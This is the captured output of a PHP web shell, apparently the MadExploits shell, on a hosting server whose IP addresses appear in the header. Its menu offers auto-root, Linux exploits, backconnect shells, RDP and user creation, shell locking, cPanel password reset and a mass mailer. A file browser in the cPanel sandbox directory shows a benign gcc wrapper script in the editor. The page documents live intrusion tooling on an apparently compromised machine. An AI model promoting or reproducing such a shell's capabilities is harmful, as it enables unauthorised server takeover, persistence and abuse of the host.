Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.133.124.23
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
local /
cpanel /
scripts /
cpan_sandbox /
x86_64 /
[ HOME SHELL ]
Name
Size
Permission
Action
cc
600
B
-rwxr-xr-x
gcc
600
B
-rwxr-xr-x
mysql_config
369
B
-rwxr-xr-x
perl
574
B
-rwxr-xr-x
xml2-config
367
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cc
#!/usr/local/cpanel/3rdparty/bin/perl $ENV{'LANG'} = 'C'; sub sixtyfoursort { if ( $a =~ /64/ ) { return 999999; } $a cmp $b; } my @paths = grep( !/cpan_sandbox/, split( /:/, $ENV{'PATH'} ) ); foreach my $path (@paths) { if ( -x $path . '/' . 'gcc' ) { my @LDS = grep( /^\-L/, @ARGV ); my @NONLDS = grep( !/^\-L/, @ARGV ); @ARGV = sort sixtyfoursort @LDS; push( @ARGV, @NONLDS ); print STDERR "gcc-64bit-hack: enabled\n"; local $ENV{'PATH'} = join( ':', @paths ); exec( $path . '/' . 'gcc', @ARGV ); } } die;
Close